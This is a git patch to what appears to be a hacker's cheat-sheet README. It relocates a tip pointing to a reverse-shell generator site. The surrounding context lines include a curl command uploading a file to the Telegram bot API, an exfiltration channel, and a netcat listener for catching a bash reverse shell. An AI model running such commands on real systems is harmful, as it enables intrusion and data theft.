From ed3ccd06a9b39d5824bebd30ee36b2b5ead6b359 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 26 Feb 2025 18:26:43 +0000 Subject: [PATCH] Update README.md --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ae97f9d..602a035 100644 --- a/README.md +++ b/README.md @@ -1491,6 +1491,9 @@ curl -sF document=@file.zip "https://api.telegram.org/bot/sendDocu --- ## 5. Reverse Shell / Dumb Shell + +Tip: Use [https://www.revshells.com/](https://www.revshells.com/) 👌 + **5.i.a. Reverse shell with gs-netcat (encrypted)** @@ -1499,8 +1502,6 @@ See [6. Backdoors](#backdoor) for a 1-liner to deploy and access a fully functio **5.i.b. Reverse shell with Bash** -Tip: Use [https://www.revshells.com/](https://www.revshells.com/) 👌 - Start netcat to listen on port 1524 on your system: ```sh nc -nvlp 1524